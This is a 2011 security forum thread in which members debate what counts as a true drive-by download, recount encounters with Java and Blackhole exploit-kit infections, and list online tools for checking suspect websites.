Drive-by Downloads

Discussion in 'malware problems & news' started by CloneRanger, Oct 16, 2011.

Thread Status:
Not open for further replies.
  1. CloneRanger

    CloneRanger Registered Member

    Joined:
    Jan 4, 2006
    Posts:
    4,833
    Ain't what they used to be !

    There was a time when DBD infections occurred without user interaction, due to having ActiveX & Scripting etc running full time :thumbd:

    Now it "seems" that, yes there still some that DBD's are waiting to pounce, but now require user interaction before infecting.

    If you know of any recent instances otherwise, please post, but NOT direct links ;)

    Also what are your thoughts in general about recent/current DBD's ability, or otherwise to infect ?
     
  2. MrBrian

    MrBrian Registered Member

    Joined:
    Feb 24, 2008
    Posts:
    6,032
    Location:
    USA
    For some statistics see https://www.wilderssecurity.com/showpost.php?p=1957300&postcount=4.

    Definition (from http://www.nsslabs.com/resources/white-papers/265/threat-definitions.html):
     
    Last edited: Oct 16, 2011
  3. J_L

    J_L Registered Member

    Joined:
    Nov 6, 2009
    Posts:
    8,516
    That is a good thing though, for most people.
     
  4. Hungry Man

    Hungry Man Registered Member

    Joined:
    May 11, 2011
    Posts:
    9,148
    I've run into dozens of Java drive-by's. Plenty of IE6 drive-by's.

    The blackhole exploit kit definitely has some.

    If they exist for Chrome I haven't seen them and I haven't had any flash.
     
  5. RJK3

    RJK3 Registered Member

    Joined:
    Apr 4, 2011
    Posts:
    855
    There are plenty of drive-by downloads out there, but you won't notice most of them on a patched machine - unless your AV or NoScript complains about a dodgy obfuscated Javascript on a page. The only sign for many (regardless of if an exploit was successful) is that their browser might have crashed, something which most just put down to a buggy browser.

    I get asked to check out pages for people often when their AV (usually Avast) complains about a certain page - in most cases it's usually a script for Blackhole Exploit Kit added to a UK website for a local business of some sort - e.g. a local car dealer, or local real estate agent, etc. Old software, bad passwords.

    I don't hear about infected ads nearly as much any more - the last time was for a local forum I occasionally read, but by the time I'd heard about it it had been sorted. With Adblock, it's like they don't exist as a webthreat.
     
    Last edited: Oct 16, 2011
  6. Hungry Man

    Hungry Man Registered Member

    Joined:
    May 11, 2011
    Posts:
    9,148
    I still hear about infected ads once in a while. There's usually a month or so where I hear a ton about it and then it goes away.
     
  7. Page42

    Page42 Registered Member

    Joined:
    Jun 18, 2007
    Posts:
    5,829
    Location:
    Last Breath Farm
    That is very encouraging to hear!
     
  8. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    Can you cite an example? Just a description -- you don't have to give a URL.

    Thanks,

    -rich
     
  9. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    I've seen some .swl files cached from Blackhole on a site, but never have had an actual exploit using it. The JAVA exploit has always taken precedence. This is with IE8.

    regards,

    -rich
     
  10. Hungry Man

    Hungry Man Registered Member

    Joined:
    May 11, 2011
    Posts:
    9,148
    I don't see the flash because they don't break the sandbox. Blackhole exploit kit probably has some in there.
     
  11. CloneRanger

    CloneRanger Registered Member

    Joined:
    Jan 4, 2006
    Posts:
    4,833
    @ Rmus

    Hi there.

    Hopefully some of these will do.

    Thought the following might interest you, & maybe others too ;)

     
  12. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    Wow! I didn't realize how much the term "Drive-by Download" has been expanded to include so many scenarios!

    Well, all scenarios where some user action is involved go beyond the simple situation where just going to a web page or opening the USB drive, triggers code to install malware. This situation is very easily dealt with, of course.

    Malware piggybacking on installers or programs is nothing new, but more properly relates to User Policies, in my view.

    For instance, in your second example, which mentions File Sharing and the Xupiter toolbar. I believe that Xupiter was well-documnented as spyware; and File Sharing, well, what can one say?

    In my not-so-humble opinion on this important matter, none of these deserves to be placed in the distinctive and honorary class of the true Drive-by Download!

    regards,

    -rich
     
  13. treehouse786

    treehouse786 Registered Member

    Joined:
    Jun 6, 2010
    Posts:
    1,388
    Location:
    Lancashire
    completely agree with you :thumb:
     
  14. CloneRanger

    CloneRanger Registered Member

    Joined:
    Jan 4, 2006
    Posts:
    4,833
    Yeah no need to be humble about it ;)

    I also agree, TRUE DBD's should be in a class of their own. Which is why i initially said DBD's "Ain't what they used to be !" according to some out there anyway !

    I guess a number of infections are Partially DVD's due to the initial code that gets automatically loaded without user intervention. But after that if users get click happy, then it's not truly DBD anymore. Maybe they should be called PDVD ?
     
  15. m00nbl00d

    m00nbl00d Registered Member

    Joined:
    Jan 4, 2009
    Posts:
    6,623
    I agree with you.

    For example, let's take example number 1.

    1 - # Downloads which a person authorized but without understanding the consequences (e.g. downloads which install an unknown or counterfeit executable program, ActiveX component, or Java applet).

    This makes me think of social engineering and not drive-by downloads.
     
  16. MrBrian

    MrBrian Registered Member

    Joined:
    Feb 24, 2008
    Posts:
    6,032
    Location:
    USA
    +1 :thumb:

    Drive-by downloads can include a social engineering component in those cases in which a user is enticed to visit a bad website. However, once at a given website, I consider a drive by download to have occurred only if vulnerabilities were exploited.
     
  17. Hungry Man

    Hungry Man Registered Member

    Joined:
    May 11, 2011
    Posts:
    9,148
    This is how I feel as well.
     
  18. rrrh1

    rrrh1 Registered Member

    Joined:
    Sep 10, 2007
    Posts:
    202
    Anyone know of a website that can check other sites for drive by downloads ?

    I sent a friend of mine a link and he said he got something there.

    He's running 7x64 and I am running XPSP3.

    I have no problems at all except for all the adds on the site.

    Since this thread is about Drive by Downloads I though it would be a great place to ask.

    rrrh1 (arch1)
     
  19. RJK3

    RJK3 Registered Member

    Joined:
    Apr 4, 2011
    Posts:
    855
    There are multiple approaches to take.

    The most obvious is to look at the HTML yourself (from a sandboxed browser). When legitimate sites are hacked, a script is added to the bottom of the HTML pointing toward a site hosting an exploit kit. Nowadays the script will be obfuscated, meaning made unclear so you can't tell where it goes. Look for "<script".

    You can use Wepawet (http://wepawet.iseclab.org/), but some of the analysis needs to be done visually as I believe the exploit kits are trying to hide from it. Look at the requests and redirects at the bottom, and then research the external sites. When you've seen exploit kit links enough, it's clearer which are the dodgy links. If the analysis is successful, Wepawet will show what malicious downloads have been made, comment on malicious Javascript, etc.

    Anubis lets you analyse a site in a different way (http://anubis.iseclab.org/).

    You can also check websites with Virustotal.com or URLVoid (http://www.urlvoid.com/), for both scans as well as reputation.

    Then there's more advanced analysis tools like Malzilla. I've a lot to learn to use that effectively.

    PM me the URL if you want.
     
Loading...
Thread Status:
Not open for further replies.